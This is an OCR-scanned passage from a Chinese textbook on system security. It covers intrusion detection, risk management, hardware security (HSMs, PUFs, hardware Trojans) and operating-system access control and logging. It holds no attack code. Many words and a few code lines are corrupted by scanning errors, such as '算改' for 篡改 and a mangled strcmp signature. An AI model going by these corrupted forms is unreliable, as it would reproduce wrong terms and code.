未 知 攻 击 , 但 一 个 明显 的 缺点 是 误 报 问题 。 当 一 个 新 的 合法 行为 出 现时 , 它 很 可 
能 被 当 作 攻 击 行为 对 待 , 因 为 事先 没有 建立 这 种 行为 的 模型 。 
通过 观察 不 难 发 现 ,基于 特征 的 入 侵 检测 和 基于 异常 的 入 侵 检测 正好 采用 了 两 种 不 
同 的 理念 。 前 者 脑子 里 装着 坏人 的 特征 ,相当 于 拿 着 坏人 的 画像 去 找 坏人 。 后 者 脑子 里 
装着 好 人 的 模型 ,相当 于 看 你 不 像 脑子 里 的 好 人 就 说 你 是 坏人 。 自 然 ,前 者 难免 找 不 全 
( 漏 报 ) ,后 者 难免 冤枉 人 ( 误 报 )。 


4.2.5 安全 管理 


常言 道 : 三 分 技术 ,七 分 管理 。 系 统 安全 思维 清晰 地 表明 应 该 通过 技术 与 管理 两 手 
抓 来 建设 系统 的 安全 性 。 
一 般 意义 上 的 安全 管理 (Security Management) 指 把 一 个 组 织 的 资产 标识 出 来 ,并 制 
定 .说 明和 实施 保护 这 些 资产 的 策略 和 流程 ,其 中 ,资产 包括 人 员 ,建筑 物 、. 机 器 .系统 和 信 
息 资产 。 安 全 管理 的 目的 是 使 一 个 组 织 的 资产 得 到 保护 ,由 资产 的 范围 可 知 , 该 目的 涵盖 
了 使 系统 和 信息 得 到 保护 。 
安全 风险 管理 是 安全 管理 的 重要 内 容 , 它 指 的 是 把 风险 管理 原则 应 用 到 安全 威胁 管 
理 之 中 ,主要 工作 包括 标识 威胁 、 评 估 现 有 威胁 控制 措施 的 有 效 性 、 确 定 风 险 的 后 果 、 基 于 
可 能 性 和 影响 的 评级 排 定 风 险 优先 级 、 划 分 风险 类 型 并 选择 合适 的 风险 策略 或 风险 响应 。 
国际 标准 化 组 织 (ISO) 确 定 的 风险 管理 原则 如 下 : 
CD. 风险 管理 应 创造 价值 , 即 为 降低 风险 投入 的 资源 代价 应 少 于 不 作为 的 后 果 。 
风险 管理 应 成 为 组 织 过程 不 可 或 缺 的 一 部 分 。 
风险 管理 应 成 为 决策 过 程 的 一 部 分 。 
风险 管理 应 明确 处 理 不 确定 性 和 假设 。 
风险 管理 应 是 一 个 系统 化 和 结构 化 的 过 程 。 
风险 管理 应 以 最 佳 可 用 信息 为 基础 。 
风险 管理 应 可 量 身 定制 。 
风险 管理 应 考虑 人 为 因素 。 
风险 管理 应 透明 和 包容 。 
风险 管理 应 是 动态 的 .和 迭代 的 和 适应 变化 的 。 
风险 管理 应 能 持续 改进 和 加 强 。 
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2 风险 管理 应 持续 地 或 周期 性 地 重新 评估 。 

系统 安全 领域 的 安全 管理 是 上 述 一 般 性 安全 管理 的 一 个 子 域 , 它 聚焦 系统 的 日 常 管 
理 , 讨 论 如 何 把 安全 理念 贯穿 到 系统 管理 工作 的 全 过 程 之 中 ,帮助 系统 管理 人 员 明 确 和 落 
实 系统 管理 工作 中 的 安全 责任 ,以 便 从 系统 管理 的 角度 提升 系统 的 安全 性 。 

dT E: 不 以 规矩 ,不 能 成 方圆 。 前 面 介 绍 安全 控制 时 ,我 们 说 用 户 访问 系统 要 守 规 
和 矩 ,那里 的 规矩 是 访问 控制 策略 。 进 行 系统 管理 也 需要 有 规矩 ,这 就 是 流程 。 系 统管 理 人 
员 开 展 工 作 前 ,要 制定 规范 的 管理 流程 。 只 有 按照 流程 管理 系统 ,才能 避免 工作 中 的 路 
漏 。 尤 其 是 安全 管理 工作 ,一 点 下 漏 就 好 比 一 个 漏洞 。 

在 开展 工作 的 过 程 中 ,在 管理 流程 的 指引 下 ,系统 管理 人 员 要 明确 以 下 工作 任务 : 搞 
清 需求 .了 解 模型 .编写 指南 、 安 装 系统 .运用 模型 指导 操作 ,持续 应 对 .自动 化 运作 。 

在 分 析 安 全 需求 时 ,要 注意 来 自 内 部 的 威胁 。 传 统 的 安全 防御 大 多 是 城堡 式 的 ,修建 
城墙 或 护城河 都 是 为 了 抵御 外 来 的 敌人 ,这 种 方式 对 于 抵御 外 敌 来 说 起 到 了 很 好 的 作用 ， 
但 对 内 部 奸 细 无 能 为 力 , 遇 到 里 应 外 合 的 攻击 时 非常 被 动 。 所 以 ,不 能 忽视 对 内 部 威胁 的 
分 析 , 比 如 数据 渗 漏 和 破坏 等 威胁 ,要 制定 相应 的 对 策 。 

系统 管理 人 员 要 了 人 解 和 熟悉 安全 模型 。 所 谓 安全 模型 就 是 安全 策略 的 形式 化 表示 ， 
例如 ,用 形式 化 的 方式 把 访问 控制 策略 表示 出 来 就 是 访问 控制 模型 。 安 全 模型 与 安全 策 
略 本 质 相同 ,形式 不 一 样 。 安 全 模型 很 多 ,典型 的 有 贝尔 - 拉 普 度 拉 模型 、 克 拉克 -威尔逊 
模型 .中 国 墙 模型 ,临床 信息 系统 安全 模型 等 。 

编写 指南 就 是 用 文档 的 方式 把 系统 的 安全 性 和 保障 能 力 方面 的 要 求 和 措施 写 清楚 ， 
细 化 到 可 操作 的 程度 ,以 便 工 作 中 所 涉及 的 人 员 能 按照 文档 的 说 明 进 行 操作 ,例如 ,文档 
要 包括 系统 安装 说 明和 用 户 使 用 指南 等 。 

每 个 系统 都 由 很 多 子 系统 组 成 。 例 如 ,一 部 手机 除了 有 操作 系统 外 还 有 很 多 APP。 
每 个 系统 都 是 通过 安装 一 个 个 子 系统 而 安装 起 来 的 。 每 安装 或 印 载 一 个 子 系统 都 有 可 能 
影响 系统 的 安全 性 。 新 安装 的 子 系统 可 能 带 来 新 的 安全 隐患 (例如 漏洞 ) 。 被 印 载 的 子 系 
统 可 能 肩负 有 安全 职责 ,卸载 它 意味 着 删除 一 些 安全 功能 。 特 别 是 ,各 个 子 系统 的 相互 作 
用 会 产生 系统 安全 性 的 整体 效应 。 所 以 ,安装 和 印 载 系统 要 有 应 对 安全 的 考虑 。 

系统 根据 安全 模型 提供 安全 功能 。 系 统管 理 人 员 要 根据 安全 需求 选取 ,配置 和 使 用 

安全 模型 。 由 于 不 同 应 用 有 不 同 的 安全 需求 ,有 时 需要 在 一 个 系统 中 运用 多 个 安全 模型 。 
不 同安 全 模型 之 间 可 能 存在 不 一 致 ,甚至 存在 冲突 ,必须 解决 安全 模型 合成 使 用 中 遇 到 的 
问题 。 

系统 安全 功能 的 正常 发 挥 与 用 户 对 系统 的 正确 操作 关系 密切 。 易 用 与 安全 常常 存在 
了 矛盾。 系统 管理 人 员 配 置 系统 时 要 权衡 易 用 性 与 安全 性 的 关系 ,为 系统 营造 容易 操作 的 
环境 ,为 用 户 提供 正确 操作 的 指引 。 

由 于 庞大 复杂 ,系统 必然 存在 漏洞 ,而 哪里 存在 漏洞 ,漏洞 何 时 暴露 ,都 具有 很 大 的 不 
确定 性 。 在 系统 管理 过 程 中 ,必须 时 刻 保持 警惕 ,及 时 应 对 。 修 补漏 洞 的 主要 办 法 是 给 系 
统 打 补丁 。 及 时 打 补 丁 很 重要 ,Wannacry 勒索 病毒 能 在 全 球 蔓延 ,很 大 程度 上 是 因为 很 
多 系统 没有 及 时 打 补 丁 。 系 统管 理 人 员 需 要 准备 打 补 丁 的 方案 ,掌握 打 补 丁 的 方法 ,还 要 
了 解 漏洞 的 生命 周期 ,能 够 处 理发 现 漏洞 如 何 报告 的 问题 。 
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安全 管理 工作 任务 繁重 ,单纯 依靠 人 工作 业已 经 很 难 应 付 , 应 想 办 法 让 机 器 来 帮忙 ， 
提升 自动 化 管理 水 平 ,帮助 提高 系统 的 安全 性 。 数 据 挖掘 技术 可 用 于 帮助 发 现 漏洞 ,数据 
分 析 技 术 可 用 于 感知 安全 态势 ,机 器 学 习 技术 可 用 于 帮助 进行 自动 防御 。 诸 如 此 类 的 技 
术 可 应 用 到 安全 管理 之 中 ,推动 技术 与 管理 融合 并 进 ,促进 系统 安全 目标 的 实现 。 


(as 系统 安全 结构 


了 解 系统 的 体系 结构 对 把 握 系 统 的 安全 性 至 关 重 要 。 系 统 的 体系 结构 可 划分 为 微观 
体系 结构 和 宏观 体系 结构 两 个 层面 。 从 计算 技术 的 角度 看 ,微观 体系 结构 的 系统 主要 是 
机 器 系统 ,它们 由 计算 机 软 硬 件 组 成 。 宏 观 体系 结构 的 系统 是 生态 系统 。 机 器 系统 可 划 
分 成 硬件 ,操作 系统 、 数 据 库 系统 和 应 用 系统 等 层次 。 因 此 ,本 节 从 硬件 系统 安全 操作 系 
统 安全 ,数据库 系统 安全 ,应 用 系统 安全 和 安全 生态 系统 等 角度 观察 系统 安全 的 体系 
结构 。 


4.3.1 硬件 系统 安全 


网 络 空间 是 个 计算 环境 , 它 主要 由 各 式 各 样 的 计算 机 通过 网 络 连接 起 来 构成 。 这 里 
所 说 的 计算 机 并 非 只 是 常见 的 笔记 本 电脑 .台式 机 、 服 务 器 .平板 计算 机 、 手 机 等 ,还 有 很 
多 藏 在 嵌入 式 设备 或 物 联网 设备 等 之 中 不 易 被 看 到 的 东西 ,它们 的 关键 特征 是 都 有 处 
gs. 

计算 机 由 硬件 和 软件 组 成 ,尽管 有 些 软件 因为 固化 在 硬件 上 而 被 称 为 固件 。 计 算 机 
提供 的 丰富 多 彩 的 功能 ,不 管 是 拍照 ,还 是 播放 音乐 .或 是 别 的 ,都 是 通过 计算 实现 的 。 硬 
件 负责 计算 ,软件 负责 发 布 计算 命令 。 硬 件 是 软件 的 载体 ,软件 在 硬件 之 上 工作 。 

在 系统 安全 的 背景 下 观察 硬件 安全 ,主要 是 观察 它 能 给 软件 提供 什么 样 的 安全 支持 ， 
如 何 帮 助 软件 实现 想 要 实现 的 安全 功能 。 同 时 ,也 观察 它 自身 可 能 存在 什么 安全 隐患 ,会 
给 系统 安全 带 来 什么 样 的 影响 。 

在 硬件 为 软件 提供 的 安全 支持 功能 中 ,最 平凡 的 一 项 是 用 于 保护 操作 系统 的 功能 。 
之 所 以 说 平凡 ,是 因为 这 项 功能 太 常 用 了 ,以 致 很 多 人 其 至 想 不 起 来 能 把 它 和 安全 挂 上 
钩 , 那 就 是 用 户 态 / 内 核 态 功能 。 

处 理 器 硬件 定义 了 用 户 态 和 内 核 态 两 种 状态 ,内 核 态 给 操作 系统 用 ,用 户 态 给 其 他 程 
序 用 ,规定 用 户 态 的 程序 不 能 干扰 内 核 态 的 程序 。 这 样 ,在 免 受 其 他 程序 破坏 的 意义 上 ， 
操作 系统 受到 了 硬件 的 保护 。 

以 通俗 的 方式 说 得 更 具体 一 点 ,硬件 把 指令 和 内 存 地 址 空间 都 分 成 了 两 大 部 分 ,内 核 
态 程 序 可 以 看 到 所 有 的 指令 和 地 址 空间 ,用 户 态 程序 只 能 看 到 其 中 一 个 部 分 的 指令 和 地 
址 空间 。 用 户 态 程 序 看 不 到 的 那 部 分 指令 称 为 特权 指令 ,看 不 到 的 那 部 分 地 址 空间 称 为 
内 核 地 址 空间 。 看 不 到 的 意思 就 是 不 能 使 用 ,就 是 说 ,用 户 态 程序 不 能 执行 特权 指令 ,不 
能 访问 内 核 地 址 空间 。 因 为 操作 系统 程序 存放 在 内 核 地 址 空间 ,用户 态 程序 不 能 往 内 核 
地 址 空间 写 东 西 , 因 此 ,就 无 法 自 改 或 破坏 操作 系统 程序 ,操作 系统 由 此 得 到 保护 。 
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对 于 用 户 程序 破坏 操作 系统 程序 这 样 的 威胁 模型 ,用户 态 /内 核 态 策略 是 有 效 的 。 可 
是 ,实践 证 明 , 黑 客 有 办 法 把 恶意 程序 插 到 内 核 地 址 空间 中 ,让 它 在 内 核 态 运行 。 这 样 一 
来 ,恶意 程序 就 有 了 算 改 操作 系统 程序 的 能 力 ,情况 变 得 糟糕 很 多 。 能 算 改 操作 系统 程序 
意味 着 自 改 应 用 程序 就 更 不 在 话 下 ,换言之 ,所 有 程序 都 有 被 算 改 的 风险 。 

应 对 自 改 的 措施 之 一 是 检测 自 改 的 发 生 , 通 常 是 计算 程序 的 摘要 并 把 它 和 原始 摘要 
进行 对 比 , 根 据 两 者 的 异同 判断 程序 有 没有 被 自 改 。 以 下 是 用 于 计算 摘要 的 一 个 函数 的 
例子 : 


unsigned char *SHAl(const unsigned char *d, unsigned long n, 


unsigned char *md); 


SHA1 这 个 函数 (程序 ) 计 算 d 中 长 度 为 n 字 节 的 消息 的 摘要 ,把 结果 存放 在 md 中 。 
以 下 是 用 于 将 两 个 摘要 作对 比 的 一 个 函数 的 例子 : 


int strcmp(const char * S1，Const char *s2); 


stremp 这 个 函数 比较 sl 和 s2 这 两 个 字符 串 ,如 果 两 者 相同 , 则 返回 结果 0。 
检查 一 个 程序 P 有 没有 被 算 改 ,就 是 用 SHA1 函数 计算 P 的 摘要 ,然后 用 strcmp FR 
数 比 较 这 个 摘要 和 以 前 保存 的 P 的 摘要 ,如 果 返 回 值 不 为 0 就 认为 程序 P 被 算 改 了 。 

问题 是 ,恶意 程序 既然 算 改 了 程序 P, 说 不 定 也 算 改 了 程序 SHA1 或 stremp, 因 为 它 
们 都 是 程序 ,本 质 上 没什么 区 别 。 这 样 一 来 ,有 关 算 改 的 判断 结论 就 值得 怀疑 了 ,明明 是 
算 改 了 ,恶意 程序 也 可 能 使 判断 得 出 没 算 改 的 结果 。 针 对 这 样 的 威胁 ,寻求 硬件 支持 是 一 
种 途径 。 如 果 用 硬件 实现 SHA1 和 stremp 之 类 的 功能 ,黑客 就 不 那么 容易 算 改 它们 了 。 

密码 运算 是 基础 的 安全 功能 ,身份 认证 .数据 加 密 等 很 多 功能 都 要 借助 它们 来 实现 。 
用 来 计算 消息 摘要 的 SHA1 就 属于 常用 的 密码 运算 之 一 。 

基于 硬件 的 加 密 技 术 用 硬件 辅助 或 者 代替 软件 实现 数据 加 密 功 能 。 一 种 典型 的 实现 
方式 是 在 通用 处 理 器 中 增加 密码 运算 指令 ,用 于 进行 密码 运算 。 另 一 种 实现 方式 是 设计 
独立 的 处 理 器 ,专门 执行 密码 运算 ,这 类 处 理 器 称 为 安全 密码 处 理 器 或 密码 加 速 器 。 

有 一 类 用 安全 密码 处 理 器 芯片 实现 的 硬件 计算 设备 称 为 硬件 安全 模块 (Hardware 
Security Module, HSMD ,除了 提供 密码 处 理 功能 之 外 ,它们 的 特点 是 具有 很 强 的 数字 密 
钥 管理 和 保护 功能 ,能 够 为 有 强 认证 需求 的 应 用 提供 密 钥 管理 支持 。 这 种 模块 通常 被 做 
成 一 种 插 卡 ,可 插 在 计算 机 主机 版 的 插 槽 上 ,或 者 被 做 成 一 种 外 接 设 备 , 可 直接 接 到 计算 
机 或 网 络 服务 器 上 。 

无 论 是 人 还 是 机 器 ,在 建设 安全 系统 的 过 程 中 都 有 进行 身份 认证 的 需要 。 人 的 指纹 
可 以 唯一 确定 一 个 人 的 身份 。 为 了 唯一 确定 一 台 机 器 的 身份 ,有 必要 为 它们 制造 数字 指 
纹 。 一 种 称 为 物理 不 可 克隆 函数 (Physical Unclonable Function. PUF) 的 硬件 器 件 可 用 
于 提供 数字 指纹 ,因为 给 定 一 个 输入 和 相应 条 件 . 它 能 产生 不 可 预期 的 唯一 输出 。PUF 
通常 用 集成 电路 实现 ,除了 可 用 于 标识 诸如 微 处 理 器 之 类 的 硬件 的 身份 之 外 ,可 用 于 生成 
密码 运算 所 需要 的 具有 唯一 性 的 密 钥 。 

用 硬件 支持 软件 实现 系统 安全 功能 的 基本 动因 是 单 靠 软件 自身 的 能 力 无 法 完全 应 对 
来 自 软件 的 攻击 ,其 中 北 含 的 一 个 无 形 的 假设 是 软件 难以 破坏 硬件 提供 的 功能 。 不 过 , 黑 
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客 不 会 仅 局 限于 采用 软件 手段 实施 攻击 ,他 们 也 会 想 尽 各 种 办 法 破解 硬件 实现 的 功能 。 

硬件 木马 是 实践 中 已 经 发 现 的 对 硬件 安全 机 制 存在 严重 威胁 的 一 种 手段 , 它 是 对 集 
成 电路 芯片 中 的 电路 系统 进行 的 恶意 修改 , 它 的 功能 一 旦 被 触发 就 会 执行 。 硬 件 木马 设 
法 绕 开 或 关闭 系统 的 安全 防线 ,可 以 借助 射电 辐射 泄露 机 密 信 息 , 还 可 以 停止 .扰乱 或 破 
坏 芯片 重要 部 分 的 功能 ,甚至 使 整个 芯片 不 能 工作 。 

硬件 木马 是 在 设计 计算 机 芯片 的 时 候 被 偷偷 插入 到 其 中 的 。 方 式 之 一 是 预 置 在 基础 
的 集成 电路 之 中 , 当 这 些 基 础 集成 电路 被 用 于 构造 计算 机 芯片 时 ,其 携带 的 木马 便 顺 理 成 
章 地 进入 计算 机 芯片 之 中 ,此 时 ,问题 出 在 计算 机 芯片 设计 的 上 游 , 连 计算 机 芯片 的 设计 
者 都 不 知道 。 方 式 之 二 是 由 计算 机 芯片 设计 企业 的 内 部 职员 插 和 人 计算机 芯片 之 中 ,也 许 
是 出 于 其 个 人 目的 ,或 者 是 被 其 他 利益 集团 收买 ,也 有 可 能 是 国家 支持 的 间谍 行为 。 

简要 地 说 ,硬件 安全 是 软件 安全 的 支撑 , 它 的 很 多 方面 体现 在 密码 工程 之 中 ,密码 技 
术 是 它 的 重要 基础 。 硬 件 安全 涉及 硬件 设计 、 访 问 控制 .安全 多 方 计算 ,安全 密 钥 存储 、 密 
钥 真实 性 保障 等 方面 ,当然 ,需要 特别 指出 的 是 ,还 涉及 确保 产品 生产 供应 链 安全 的 措施 。 


4.3.2 ”操作 系统 安全 


操作 系统 是 直接 控制 硬件 工作 的 基础 软件 系统 , 它 紧 贴 在 硬件 之 上 , 介 于 硬件 与 应 用 
软件 之 间 , 这 样 的 特殊 地 位 决定 了 它 在 系统 安全 中 具有 不 可 替代 的 作用 。 没 有 操作 系统 
提供 的 安全 支持 ,应 用 系统 的 安全 性 无 法 得 到 保障 。 不 妨 以 常用 的 加 密 功能 为 例 考察 这 
个 问题 。 

假设 某 应 用 程序 需要 利用 加 密 技术 对 数据 进行 加 密 保护 ,系统 配备 了 硬件 加 密 设 备 。 
硬件 加 密 设 备 能 够 正确 实现 所 需 的 加 密 功 能 ,加 密 所 需 的 密 钥 可 以 在 硬件 加 密 设备 中 安 
全 地 生成 。 在 硬件 的 保护 下 ,加 密 算 法 和 密 钥 既 不 会 泄露 也 不 会 被 破坏 ,这 方面 可 以 完全 
摆脱 对 操作 系统 的 依赖 。 在 这 样 强 有 力 的 假设 前 提 下 ,如 果 没 有 操作 系统 提供 相应 的 功 
能 ,应 用 程序 完成 加 密 任务 依然 存在 薄弱 之 处 。 

第 一 个 弱点 是 无 法 保证 硬件 设备 的 加 密 机 制 能 够 顺利 启动 。 攻 击 者 可 以 利用 恶意 程 
序 干扰 该 应 用 程序 启动 加 密 机 制 的 操作 。 由 于 都 在 用 户 地 址 空间 ,恶意 程序 比较 容易 自 
改 该 应 用 程序 。 具 体 地 说 ,恶意 程序 可 以 自 改 该 应 用 程序 中 启动 加 密 机 制 的 代码 ,使 该 代 
码 根本 不 发 出 启动 加 密 机 制 的 命令 ,然后 ,冒充 加 密 机 制 与 该 应 用 程序 交互 。 虽 然 该 应 用 
程序 并 没有 启动 加 密 机 制 , 但 它 以 为 加 密 机 制 已 经 启动 了 ,在 后 续 的 工作 中 , 当 它 把 待 加 
密 数 据 传 给 加 密 机 制 时 ,实际 上 数据 都 由 恶意 程序 代 收 了 。 

该 弱点 之 所 以 存在 ,主要 是 因为 应 用 程序 与 硬件 加 密 机 制 之 间 缺 乏 一 条 可 信 的 交互 
路 径 , 这 样 的 可 信 交 互 路 径 只 能 由 操作 系统 帮助 建立 ,应 用 程序 自身 无 法 把 它 建立 起 来 。 

第 二 个 弱点 是 无 法 保证 硬件 设备 的 加 密 机 制 不 被 滥用 。 滥 用 硬件 加 密 机 制 的 意思 是 
当 合 法 应 用 程序 启动 了 该 加 密 机 制 之 后 ,其 他 应 用 程序 有 可 能 使 用 该 加 密 机 制 ,包括 使 用 
其 中 的 算法 和 密 钥 。 当 合法 应 用 程序 A 启动 了 硬件 加 密 机 制 H 之 后 ,就 建立 起 了 一 个 A 
与 H 之 间 的 会 话 S, 就 好 比 接 通 了 一 个 电话 一 样 。 此 后 ,A 是 在 会 话 S 中 使 用 HH 的 功能 
的 。 由 于 硬件 加 密 机 制 本 身 无 法 区 分 不 同 的 应 用 ,如 果 期 间 有 恶意 程序 B 利用 会 话 S 使 
用 H 的 功能 , 那 是 有 可 能 的 ,正如 你 正在 打 电 话 , 有 人 跑 到 你 身边 向 对 方 喊话 一 样 。 在 这 
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种 情况 下 ,H 认为 B 也 是 A, 因 此 向 A 开放 的 服务 、 算 法 和 密 钥 同样 也 向 B 开 放 ,B 以 这 
种 方式 使 用 H 就 是 对 H 的 滥用 。 

如 果 能 在 应 用 程序 与 硬件 加 密 机 制 之 间 构建 一 条 可 信 交 互 路 径 , 就 能 排除 其 他 应 用 
程序 横 插 进来 利用 它们 之 间 的 会 话 , 从 而 克服 第 二 个 弱点 。 如 果 能 把 硬件 加 密 机 制 隔离 
起 来 ,只 允许 激活 该 机 制 的 应 用 程序 使 用 ,也 能 避免 滥用 的 发 生 。 这 两 种 办 法 借助 操作 系 
统 都 可 以 做 得 到 ,但 应 用 程序 却 无 能 为 力 。 

在 观察 操作 系统 对 应 用 安全 的 支持 作用 时 ,可 以 看 到 创建 可 信 路 径 是 操作 系统 的 一 
项 重要 的 安全 功能 。 了 解 操 作 系统 的 安全 性 ,可 以 从 操作 系统 提供 的 基本 安全 功能 开始 。 

对 用 户 进行 管理 可 以 说 是 操作 系统 提供 安全 支持 的 开端 ,因为 用 户 是 对 系统 进行 访 
问 的 最 基本 的 行为 主体 ,例如 , 某 用 户 查 看 系统 中 的 某 文件 ,用 户 是 查看 文件 行为 的 主体 。 
不 过 要 注意 ,这 里 的 用 户 严格 来 说 是 账户 ,并 不 是 人 。 一 个 人 在 一 个 系统 中 可 以 有 多 个 账 
户 , 因 此 ,可 以 对 应 多 个 用 户 。 

操作 系统 建立 用 户 档案 ,记录 每 一 个 注册 过 的 用 户 的 信息 。 每 个 用 户 有 一 个 用 户 名 ， 
在 注册 时 由 人 提供 。 每 个 用 户 有 一 个 标识 ,由 操作 系统 生成 。 存 在 于 用 户 档 案 中 的 用 户 
才 是 合法 用 户 , 合 法 用 户 才 允 许 登 录 和 使 用 系统 。 用 户 名 是 供 人 使 用 的 ,用 字符 串 表示 。 
用 户 标识 是 供 机 器 使 用 的 ,通常 用 数字 表示 。 
操作 系统 力求 利用 双方 都 享有 而 别人 提供 不 了 的 信息 建立 用 户 与 人 之 间 的 关联 。 该 
用 途 的 最 常用 信息 是 口令 。 该 信息 保存 在 用 户 档案 中 。 人 想 登 录 系 统 时 ,除了 要 向 系统 

提供 用 户 名 外 ,还 要 提供 该 信息 ,操作 系统 把 人 提供 的 该 信息 与 用 户 档案 中 保存 的 副本 作 
比 对 ,如 果 两 者 吻合 ,就 把 这 个 人 和 他 所 声称 的 用 户 关联 起 来 ,认为 这 个 人 就 是 那个 用 户 。 
这 个 过 程 属于 身份 认证 。 

管理 用 户 时 ,操作 系统 还 对 用 户 进行 分 组 ,每 个 组 有 一 个 组 名 和 一 个 组 标识 。 每 个 用 
户 至 少 归 属 一 个 组 ,可 以 归属 多 个 组 ,归属 多 个 组 时 ,有 一 个 组 被 确定 为 当前 组 ,在 用 户 档 
案 中 会 有 标注 。 操 作 系统 针对 用 户 作 安 全 决策 时 ,用 户 标识 和 组 标识 都 会 成 为 衡量 依据 。 

用 户 身 份 标 识 与 认证 是 操作 系统 提供 的 最 基础 的 安全 功能 ,是 实施 其 他 一 切 安 全 功 
能 的 基础 。 身 份 标识 体现 在 用 户 管理 之 中 ,身份 认证 体现 在 用 户 登录 系统 的 过 程 之 中 。 
登录 过 程 也 是 操作 系统 确立 人 与 用 户 之 间 的 关联 关系 的 过 程 。 

操作 系统 提供 的 第 二 个 基本 安全 功能 是 自主 访问 控制 。 用 户 保存 在 计算 机 中 的 信息 
以 文件 的 形式 呈现 ,这 是 操作 系统 定义 的 用 户 接口 ,大 家 已 经 习惯 了 。 为 了 保护 这 些 文 
件 ,操作 系统 为 它们 设立 了 访问 权限 ,基本 的 权限 有 读 、 写 .执行 等 三 种 ,可 分 别 用 字母 +、 
w、x 表示 。 查 看 文件 的 内 容 需 要 读 权限 ,修改 文件 的 内 容 需 要 写 权 限 ,如 果 文 件 对 应 的 
是 一 个 程序 ,执行 该 程序 需要 执行 权限 。 

在 自主 访问 控制 中 ,文件 的 拥有 者 可 以 自主 确定 任何 用 户 对 该 文件 的 访问 权限 ,也 就 
是 可 以 授权 用 户 对 该 文件 的 访问 。 在 现实 生活 中 ,物品 的 拥有 者 可 以 自由 决定 谁 可 以 或 
不 可 以 使 用 该 物品 ,自主 访问 控制 与 此 类 似 。 假 设 用 户 U1 是 文件 Fl 的 拥有 者 ,U2 是 任 
意 用 户 ,那么 ,Ul 可 以 授权 U2 获得 访问 Fl 的 rw、x 中 的 一 项 或 多 项 权限 ,当然 ,Ul 也 
可 以 撤销 U2 已 获得 的 访问 Fl 的 任意 一 项 权限 。 

访问 权限 既 可 以 授 给 用 户 ,也 可 以 授 给 用 户 组 ,如 果 U1 把 访问 Fl 的 某 些 权限 授 给 
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了 用 户 组 Gl ,那么 ,归属 于 G1 的 所 有 用 户 都 可 以 享有 访问 Fl 的 这 些 权 限 。 

操作 系统 对 系统 中 的 用 户 有 所 划分 ,至 少 划分 为 普通 用 户 和 系统 管理 员 两 大 类 。 系 
统管 理 员 在 系统 中 享有 比 普通 用 户 大 得 多 的 权力 。 一 般 情况 下 ,不 管 某 个 文件 的 拥有 者 
是 谁 ,系统 管理 员 都 可 以 对 它 进行 授权 。UNIX/Linux 类 操作 系统 设立 了 一 个 用 户 名 为 
root 的 系统 管理 员 , 它 被 称 为 超级 用 户 ,在 这 类 操作 系统 中 ,大 多 数 系统 文件 的 拥有 者 都 
是 root。 如 果 划 分 得 细 一 点 ,系统 中 可 能 还 设 有 安全 管理 员 ,专门 负责 诸如 授权 等 安全 方 
面 的 管理 。 

对 文件 的 访问 控制 是 用 户 看 得 到 的 ,也 是 用 户 可 以 直接 操作 的 。 对 内 存 区 域 的 访问 
也 存在 访问 控制 问题 ,只 是 用 户 一 般 看 不 到 ,通常 也 感受 不 到 。 内 存 的 访问 控制 以 进程 为 
行为 主体 ,以 内 存 区 域 为 访问 客体 ,基本 访问 权限 也 有 r、w、x 等 三 种 。 内 存 控 制 单元 硬 
件 为 内 存 的 访问 控制 提供 相应 的 支持 功能 ,如 果 没 有 这 些 硬 件 功 能 作为 基础 ,操作 系统 也 
难以 实现 内 存 区 域 的 访问 控制 。 

像 Adept-50 这 样 的 操作 系统 重点 实现 了 强制 访问 控制 ,访问 控制 的 强制 性 体现 在 它 
实现 的 一 个 多 级 安全 策略 (Multi-Level Security, MLS) 上 。 多 级 的 意思 体现 在 信息 按照 
保密 程度 划分 了 多 个 级 别 , 用 户 按照 职务 层次 划分 了 多 个 等 级 。 访 问 许 可 的 判断 依据 是 
信息 的 级 别 和 用 户 的 等 级 ,不 是 用 户 的 意愿 ,所 以 是 强制 的 ,不 是 自主 的 。 

多 级 安全 策略 的 现实 需要 最 初 来 源 于 军事 领域 。 军 方 按 由 高 到 低 的 顺序 把 信息 划分 
成 绝密 .机密 、 秘 密 、 非 密 等 多 个 级 别 , 而 军人 的 职务 本 身 就 等 级 分 明 , 司 令 比 军 长 等 级 高 ， 
班长 比 普 通 士兵 等 级 高 ,不 言 而 喻 。 以 信息 密级 和 军人 等 级 等 为 指标 制定 出 使 用 军事 信 
息 的 规则 ,就 形成 了 现实 中 的 多 级 安全 策略 。Adept-50 其 实 就 是 为 军 方 开 发 的 。 

在 系统 管理 中 ,给 信息 和 用 户 打 标签 是 实施 多 级 安全 策略 的 重要 工作 ,信息 的 标签 标 
出 信息 的 涉 密级 别 , 用 户 的 标签 标 出 用 户 的 涉 密 等 级 。 系 统 的 多 级 安全 机 制 提供 了 存储 
标签 的 数据 结构 ,系统 的 安全 管理 人 员 需 要 给 信息 和 用 户 的 标签 赋值 ,也 就 是 配置 系统 中 
的 各 种 主 / 客 体 标签 ,这 就 是 授权 工作 。 信 息 的 组 织 形式 是 文件 ,所 以 ,给 信息 贴标签 实际 
上 是 给 文件 配置 标签 的 值 。 当 然 , 除 了 文件 和 用 户 之 外 ,系统 中 的 所 有 主 / 客 体 都 要 配置 
标签 信息 。 

最 著名 的 多 级 安全 策略 模型 是 贝尔 - 拉 普 度 拉 (BLP) 模 型 ,虽然 Adept-50 实现 的 还 
不 是 该 模型 。 实 现 强 制 访问 控制 的 最 初 动因 是 实现 多 级 安全 策略 ,而 最 初 的 多 级 安全 策 
略 主要 关心 信息 的 保密 需求 。 不 过 ,不 管 是 多 级 安全 策略 还 是 强制 访问 控制 ,在 后 来 的 发 
展 中 都 得 到 了 拓展 ,应 用 范围 拓宽 了 很 多 。 并 非 只 有 Adept-50 这 样 的 古老 系统 才 提供 强 
制 访问 控制 功能 ,现代 流行 的 SE-Linux 开源 系统 也 提供 这 类 功能 .由 于 Android 操作 系 
统 的 底层 是 Linux 内 核 .不 少 Android 系统 手机 也 引入 了 SE-Linux 的 功能 。 

操作 系统 提供 自主 访问 控制 .强制 访问 控制 等 很 多 安全 控制 功能 ,这 些 功 能 发 挥 得 怎 
么 样 ,系统 的 安全 性 处 于 什么 状态 ,对 掌握 这 些 情 况 ,操作 系统 也 提供 相应 的 支持 ,日 志 机 
制 就 是 专门 为 此 目的 设计 的 。 

操作 系统 提供 的 日 志 功能 记录 系统 中 发 生 的 重要 活动 的 详细 信息 ,例如 ,以 下 是 操作 
系统 产生 的 一 条 日 志 记 录 的 信息 : 


Aug 21 14:44:24 siselab su(pam unix) [1149]: session opened for user root by alice 
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这 条 日 志 信息 把 在 确定 日 期 确定 时 间 发 生 的 一 个 事件 详细 地 记录 了 下 来 ,时 间 精 确 到 秒 。 
